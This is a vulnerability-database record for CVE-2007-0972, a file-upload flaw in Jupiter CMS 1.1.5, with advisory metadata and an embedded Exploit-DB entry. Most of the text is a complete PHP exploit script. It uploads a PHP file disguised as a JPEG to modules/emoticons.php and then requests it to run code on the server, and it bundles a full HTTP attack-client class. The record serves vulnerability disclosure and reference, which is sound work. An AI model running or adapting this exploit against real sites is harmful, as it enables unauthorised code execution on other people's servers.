ID CVE-2007-0972 Type cve Reporter NVD Modified 2018-10-16T12:35:49
Description
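Unrestricted file upload vulnerability in modules/emoticons.php in Jupiter CMS 1.1.5 allows remote attackers to upload arbitrary files by modifying the HTTP request so that it sends an image content type and omits the is_guest and is_user parameters. In other words, the upload check appears to rely on values the client controls (the declared Content-Type and the presence of those parameters) rather than on server-side validation of the file and the session, so a file with a script extension is accepted as an image. NOTE: this issue might be related to CVE-2006-4875.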
{"osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 33730](https://vulners.com/osvdb/OSVDB:33730)\n[Related OSVDB ID: 33727](https://vulners.com/osvdb/OSVDB:33727)\n[Related OSVDB ID: 33729](https://vulners.com/osvdb/OSVDB:33729)\n[Related OSVDB ID: 33731](https://vulners.com/osvdb/OSVDB:33731)\nOther Advisory URL: http://mgsdl.free.fr/advisories/12070214.txt\nOther Advisory URL: http://www.acid-root.new.fr/advisories/12070214.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0238.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0228.html\nISS X-Force ID: 32517\nGeneric Exploit URL: http://milw0rm.com/exploits/3311\n[CVE-2007-0972](https://vulners.com/cve/CVE-2007-0972)\nBugtraq ID: 22560\n", "modified": "2007-02-14T02:51:48", "published": "2007-02-14T02:51:48", "href": "https://vulners.com/osvdb/OSVDB:33728", "id": "OSVDB:33728", "title": "Jupiter CMS modules/emoticons.php Unrestricted File Upload", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:11:17", "bulletinFamily": "exploit", "description": "Jupiter CMS 1.1.5 Remote File Upload Exploit. CVE-2007-0972. 
Webapps exploit for php platform", "modified": "2007-02-14T00:00:00", "published": "2007-02-14T00:00:00", "id": "EDB-ID:3311", "href": "https://www.exploit-db.com/exploits/3311/", "type": "exploitdb", "title": "Jupiter CMS 1.1.5 - Remote File Upload Exploit", "sourceData": "<?\n/*\nTitle: Jupiter CMS 1.1.5 File Upload Vulnerability\nAdvisory ID: 12070214\nRisk level: High\nAuthor: DarkFig <gmdarkfig@gmail.com>\nURL: http://www.acid-root.new.fr/advisories/12070214.txt\n*/\n\nerror_reporting(E_ALL ^ E_NOTICE);\n$url = ' http://localhost/jupiter/';\n\n$xpl = new phpsploit();\n$xpl->agent(\"Mozilla\");\n$arr = array(frmdt_url => $url.'modules/emoticons.php',\n \"a\" => 1,\n \"req_file\" => array(frmdt_filename => \"iamaphpfile.php\",\n frmdt_type => \"image/jpeg\",\n frmdt_content => \"<?php echo(iamontheserver); ?>\"));\n$xpl->formdata($arr);\n$xpl->get($url.'images/emoticons/iamaphpfile.php');\nprint($xpl->getcontent());\n\n/*\n * \n * Copyright (C) darkfig\n * \n * This program is free software; you can redistribute it and/or \n * modify it under the terms of the GNU General Public License \n * as published by the Free Software Foundation; either version 2 \n * of the License, or (at your option) any later version. \n * \n * This program is distributed in the hope that it will be useful, \n * but WITHOUT ANY WARRANTY; without even the implied warranty of \n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n * GNU General Public License for more details. 
\n * \n * You should have received a copy of the GNU General Public License \n * along with this program; if not, write to the Free Software \n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n * \n * TITLE: PhpSploit Class\n * REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4)\n * VERSION: 1.2\n * LICENSE: GNU General Public License\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\n * FILENAME: phpsploitclass.php\n *\n * CONTACT: gmdarkfig@gmail.com (french / english)\n * GREETZ: Sparah, Ddx39\n *\n * DESCRIPTION:\n * The phpsploit is a class implementing a web user agent.\n * You can add cookies, headers, use a proxy server with (or without) a\n * basic authentification. It supports the GET and the POST method. It can\n * also be used like a browser with the cookiejar() function (which allow\n * a server to add several cookies for the next requests) and the\n * allowredirection() function (which allow the script to follow all\n * redirections sent by the server). It can return the content (or the\n * headers) of the request. 
Others useful functions can be used for debugging.\n * A manual is actually in development but to know how to use it, you can\n * read the comments.\n *\n * CHANGELOG:\n * [2007-01-24] (1.2)\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\n * * New: multipart/form-data enctype is now supported \n *\n * [2006-12-31] (1.1)\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\n * * New: You can now call the getheader() / getcontent() function without parameters\n *\n * [2006-12-30] (1.0)\n * * First version\n * \n */\n\nclass phpsploit {\n\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it, this is the main function.\n\t *\n\t * @return $server_response\n\t */\n\tprivate function sock()\n\t{\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\n\t\telse $socket = fsockopen($this->host,$this->port);\n\t\t\n\t\tif(!$socket) die(\"Error: The host doesn't exist\");\n\t\t\n\t\tif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\";\n\t\telseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. 
\" HTTP/1.1\\r\\n\";\n\t\telse die(\"Error: Invalid method\");\n\t\t\n\t\tif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\";\n\t\t$this->packet .= \"Host: \".$this->host.\"\\r\\n\";\n\t\t\n\t\tif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\";\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\";\n\t\tif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\";\n\t\t\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\n\t\tif($this->method===\"post\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\n\t\t}\n\t\telseif($this->method===\"formdata\")\n\t\t{\n\t\t\t$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\n\t\t\t$this->packet .= $this->data;\n\t\t}\n\t\t$this->packet .= \"\\r\\n\";\n\t\t$this->recv = '';\n\t\t\n\t\tfputs($socket,$this->packet);\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\n\t\tfclose($socket);\n\t\t\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\n\t\telse return $this->recv;\n\t}\n\t\n\n\t/**\n\t * This function allows you to add several cookie in the\n\t * request. 
Several methods are supported:\n\t * \n\t * $this->addcookie(\"name\",\"value\");\n\t * or\n\t * $this->addcookie(\"name=newvalue\");\n\t * or\n\t * $this->addcookie(\"othername=overvalue; xx=zz; y=u\");\n\t * \n\t * @param string $cookiename\n\t * @param string $cookievalue\n\t * \n\t */\n\tpublic function addcookie($cookn,$cookv='')\n\t{\n\t\t// $this->addcookie(\"name\",\"value\"); work avec replace\n\t\tif(!empty($cookv))\n\t\t{\n\t\t\tif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete\n\t\t\tif(!empty($this->cookie))\n\t\t\t{\n\t\t\t if(preg_match(\"/$cookn=/\",$this->cookie))\n\t\t\t {\n\t\t\t \t$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie);\n\t\t\t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".\n\t\t\t }\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->cookie = $cookn.\"=\".$cookv.\";\";\n\t\t\t}\n\t\t}\n\t\t// $this->addcookie(\"name=value; othername=othervalue\");\n\t\telse\n\t\t{\n\t \t if(!empty($this->cookie))\n\t \t {\n\t \t \t$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);\n\t \t \t$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\n\t \t \t{\n\t \t \t\tpreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches);\n\t \t \t\t$cookn = $matches[1];\n\t \t \t\t$cookv = $matches[2];\n\t \t \t\t$this->addcookie($cookn,$cookv);\n\t \t \t}\n\t \t }\n\t\t\t else\n\t\t\t {\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";\n\t\t\t \t$this->cookie = $cookn;\t\t\t\n\t\t\t }\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to add several headers in the\n\t * request. 
Several methods are supported:\n\t *\n\t * $this->addheader(\"headername\",\"headervalue\");\n\t * or\n\t * $this->addheader(\"headername: headervalue\");\n\t *\n\t * @param string $headername\n\t * @param string $headervalue\n\t */\n\tpublic function addheader($headern,$headervalue='')\n\t{\n\t\t// $this->addheader(\"name\",\"value\");\n\t\tif(!empty($headervalue))\n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\tif(preg_match(\"/$headern:/\",$this->header))\n\t\t\t\t{\n\t\t\t\t\t$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->header .= \"\\r\\n\".$headern.\": \".$headervalue;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern.\": \".$headervalue;\n\t\t\t}\n\t\t}\n\t\t// $this->addheader(\"name: value\");\n\t\telse \n\t\t{\n\t\t\tif(!empty($this->header))\n\t\t\t{\n\t\t\t\t$headarr = explode(\": \",$headern);\n\t\t\t\t$headern = $headarr[0];\n\t\t\t\t$headerv = $headarr[1];\n\t\t\t\t$this->addheader($headern,$headerv);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$this->header=$headern;\n\t\t\t}\n\t\t}\n\t}\n\t\n\n\t/**\n\t * This function allows you to use an http proxy server.\n\t * Several methods are supported:\n\t * \n\t * $this->proxy(\"proxyip\",\"8118\");\n\t * or\n\t * $this->proxy(\"proxyip:8118\")\n\t *\n\t * @param string $proxyhost\n\t * @param integer $proxyport\n\t */\n\tpublic function proxy($proxy,$proxyp='')\n\t{\n\t\t// $this->proxy(\"localhost:8118\");\n\t\tif(empty($proxyp))\n\t\t{\n\t\t\tpreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr);\n\t\t\t$proxh = $proxarr[1];\n\t\t\t$proxp = $proxarr[2];\n\t\t\t$this->proxyhost=$proxh;\n\t\t\t$this->proxyport=$proxp;\n\t\t}\n\t\t// $this->proxy(\"localhost\",8118);\n\t\telse \n\t\t{\n\t\t\t$this->proxyhost=$proxy;\n\t\t\t$this->proxyport=intval($proxyp);\n\t\t}\n\t\tif($this->proxyport > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\n\t/**\n\t * This function allows you 
to use an http proxy server\n\t * which requires a basic authentification. Several\n\t * methods are supported:\n\t * \n\t * $this->proxyauth(\"darkfig\",\"dapasswd\");\n\t * or\n\t * $this->proxyauth(\"darkfig:dapasswd\");\n\t *\n\t * @param string $proxyuser\n\t * @param string $proxypass\n\t */\n\tpublic function proxyauth($proxyauth,$proxypasse='')\n\t{\n\t\t// $this->proxyauth(\"darkfig:password\");\n\t\tif(empty($proxypasse))\n\t\t{\n\t\t\tpreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);\n\t\t\t$proxu = $proxautharr[1];\n\t\t\t$proxp = $proxautharr[2];\n\t\t\t$this->proxyuser=$proxu;\n\t\t\t$this->proxypass=$proxp;\n\t\t}\n\t\t// $this->proxyauth(\"darkfig\",\"password\");\n\t\telse\n\t\t{\n\t\t\t$this->proxyuser=$proxyauth;\n\t\t\t$this->proxypass=$proxypasse;\n\t\t}\n\t}\n\n\t\n\t/**\n\t * This function allows you to set the \"User-Agent\" header.\n\t * Several methods are possible to do that:\n\t * \n\t * $this->agent(\"Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent: Mozilla Firefox\");\n\t * or\n\t * $this->addheader(\"User-Agent\",\"Mozilla Firefox\");\n\t * \n\t * @param string $useragent\n\t */\n\tpublic function agent($useragent)\n\t{\n\t\t$this->agent=$useragent;\n\t}\n\n\t\n\t/**\n\t * This function returns the header which will be\n\t * in the next request.\n\t * \n\t * $this->showheader();\n\t *\n\t * @return $header\n\t */\n\tpublic function showheader()\n\t{\n\t\treturn $this->header;\n\t}\n\n\t\n\t/**\n\t * This function returns the cookie which will be\n\t * in the next request.\n\t * \n\t * $this->showcookie();\n\t *\n\t * @return $storedcookies\n\t */\n\tpublic function showcookie()\n\t{\n\t\treturn $this->cookie;\n\t}\n\n\t\n\t/**\n\t * This function returns the last formed\n\t * http request (the http packet).\n\t * \n\t * $this->showlastrequest();\n\t * \n\t * @return $last_http_request\n\t */\n\tpublic function showlastrequest()\n\t{\n\t\treturn $this->packet;\n\t}\n\t\n\t\n\t/**\n\t * This function sends the 
formed http packet with the\n\t * GET method. You can precise the port of the host.\n\t * \n\t * $this->get(\"http://localhost\");\n\t * $this->get(\"http://localhost:888/xd/tst.php\");\n\t * \n\t * @param string $urlwithpath\n\t * @return $server_response\n\t */\n\tpublic function get($url)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"get\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method. You can precise the port of the host.\n\t * \n\t * $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");\n\t *\n\t * @param string $urlwithpath\n\t * @param string $postdata\n\t * @return $server_response\n\t */\t\n\tpublic function post($url,$data)\n\t{\n\t\t$this->target($url);\n\t\t$this->method=\"post\";\n\t\t$this->data=$data;\n\t\treturn $this->sock();\n\t}\n\t\n\n\t/**\n\t * This function sends the formed http packet with the\n\t * POST method using the multipart/form-data enctype. \n\t * \n\t * $array = array(\n\t * frmdt_url => \"http://localhost/upload.php\",\n\t * frmdt_boundary => \"123456\", # Optional\n\t * \"email\" => \"me@u.com\",\n\t * \"varname\" => array(\n\t * frmdt_type => \"image/gif\", # Optional\n\t * frmdt_transfert => \"binary\", # Optional\n\t * frmdt_filename => \"hello.php\",\n\t * frmdt_content => \"<?php echo ':)'; ?>\"));\n\t * $this->formdata($array);\n\t *\n\t * @param array $array\n\t * @return $server_response\n\t */\n\tpublic function formdata($array)\n\t{\n\t\t$this->target($array[frmdt_url]);\n\t\t$this->method=\"formdata\";\n\t\t$this->data='';\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";\n\t\telse $this->boundary=$array[frmdt_boundary];\n\t\tforeach($array as $key => $value)\n\t\t{\n\t\t\tif(!preg_match(\"#^frmdt_(boundary|url)#\",$key))\n\t\t\t{\n\t\t\t\t$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\";\n\t\t\t\t$this->data .= \"Content-Disposition: form-data; 
name=\\\"\".$key.\"\\\";\";\n\t\t\t\tif(!is_array($value))\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\";\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\";\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\";\n\t\treturn $this->sock();\n\t}\n\n\t\n\t/**\n\t * This function returns the content of the server response\n\t * without the headers.\n\t * \n\t * $this->getcontent($this->get(\"http://localhost/\"));\n\t * or\n\t * $this->getcontent();\n\t *\n\t * @param string $server_response\n\t * @return $onlythecontent\n\t */\n\tpublic function getcontent($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$content = explode(\"\\n\",$code);\n\t\t$onlycode = '';\n\t\tfor($i=1;$i<count($content);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1;\n\t\t\tif($ok) $onlycode .= $content[$i].\"\\n\";\n\t\t}\n\t\treturn $onlycode;\n\t}\n\n\t\n\t/**\n\t * This function returns the headers of the server response\n\t * without the content.\n\t * \n\t * $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));\n\t * or\n\t * $this->getheader();\n\t *\n\t * @param string $server_response\n\t * @return $onlytheheaders\n\t */\n\tpublic function getheader($code='')\n\t{\n\t\tif(empty($code)) $code = $this->recv;\n\t\t$header = explode(\"\\n\",$code);\n\t\t$onlyheader = $header[0].\"\\n\";\n\t\tfor($i=1;$i<count($header);$i++)\n\t\t{\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$header[$i])) break;\n\t\t\t$onlyheader .= $header[$i].\"\\n\";\n\t\t}\n\t\treturn 
$onlyheader;\n\t}\n\n\t\n\t/**\n\t * This function is called by the cookiejar() function.\n\t * It adds the value of the \"Set-Cookie\" header in the \"Cookie\"\n\t * header for the next request. You don't have to call it.\n\t * \n\t * @param string $server_response\n\t */\n\tprivate function getcookie($code)\n\t{\n\t\t$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code));\n\t\tfor($z=0;$z<count($carr);$z++)\n\t\t{\n\t\t\tif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))\n\t\t\t{\n\t\t\t\t$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));\n\t\t\t}\n\t\t}\n\n\t\tfor($i=0;$i<count($cookie);$i++)\n\t\t{\n\t\t\tpreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches);\n\t \t $cookn = $matches[1];\n\t \t $cookv = $matches[2];\n\t \t $this->addcookie($cookn,$cookv);\n\t\t}\n }\n\n\t\n\t/**\n\t * This function is called by the get()/post() functions.\n\t * You don't have to call it.\n\t *\n\t * @param string $urltarg\n\t */\n\tprivate function target($urltarg)\n\t{\n\t\tif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\";\n\t\t$this->url=$urltarg;\n\t\t\n\t\t$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)));\n\t\t$this->host=$array[0];\n\n\t\tpreg_match(\"/:(\\d+)\\//\",$urltarg,$matches);\n\t\t$this->port=empty($matches[1]) ? 
80 : $matches[1];\n\t\t\n\t\t$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg));\n\t\tpreg_match(\"/\\/(.*)\\//\",$temp,$matches);\n\t\t$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");\n\t\n\t\tif($this->port > 65535) die(\"Error: Invalid port number\");\n\t}\n\t\n\t\n\t/**\n\t * If you call this function, the script will\n\t * extract all \"Set-Cookie\" headers values\n\t * and it will automatically add them into the \"Cookie\" header\n\t * for all next requests.\n\t *\n\t * $this->cookiejar(1); // enabled\n\t * $this->cookiejar(0); // disabled\n\t * \n\t */\n\tpublic function cookiejar($code)\n\t{\n\t\tif($code===0) $this->cookiejar='';\n\t\tif($code===1) $this->cookiejar=1;\n\t\telse\n\t\t{\n\t\t\t$this->getcookie($code);\n\t\t}\n\t}\n\n\n\t/**\n\t * If you call this function, the script will\n\t * follow all redirections sent by the server.\n\t * \n\t * $this->allowredirection(1); // enabled\n\t * $this->allowredirection(0); // disabled\n\t * \n\t * @return $this->get($locationresponse)\n\t */\n\tpublic function allowredirection($code)\n\t{\n\t\tif($code===0) $this->allowredirection='';\n\t\tif($code===1) $this->allowredirection=1;\n\t\telse\n\t\t{\n\t\t\tif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))\n\t\t\t{\n\t\t\t\t$location = str_replace(chr(13),'',$codearr[2]);\n\t\t\t\tif(!eregi(\"://\",$location))\n\t\t\t\t{\n\t\t\t\t\treturn $this->get(\"http://\".$this->host.$this->path.$location);\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\treturn $this->get($location);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\treturn $code;\n\t\t\t}\n\t\t}\n\t}\n\t\n\t\n\t/**\n\t * This function allows you to reset some parameters:\n\t * \n\t * $this->reset(header); // headers cleaned\n\t * $this->reset(cookie); // cookies cleaned\n\t * $this->reset(); // clean all parameters\n\t *\n\t * @param string $func\n\t */\n\tpublic function reset($func='')\n\t{\n\t\tswitch($func)\n\t\t{\n\t\t\tcase 
\"header\":\n\t\t\t$this->header='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tcase \"cookie\":\n\t\t\t$this->cookie='';\n\t\t\tbreak;\n\t\t\t\n\t\t\tdefault:\n\t\t $this->cookiejar='';\n\t\t $this->header='';\n\t\t $this->cookie='';\n\t\t $this->allowredirection=''; \n\t\t $this->agent='';\n\t\t break;\n\t\t}\n\t}\n}\n?>\n\n# milw0rm.com [2007-02-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3311/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "modified": "2007-02-14T00:00:00", "published": "2007-02-14T00:00:00", "id": "SECURITYVULNS:VULN:7236", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7236", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}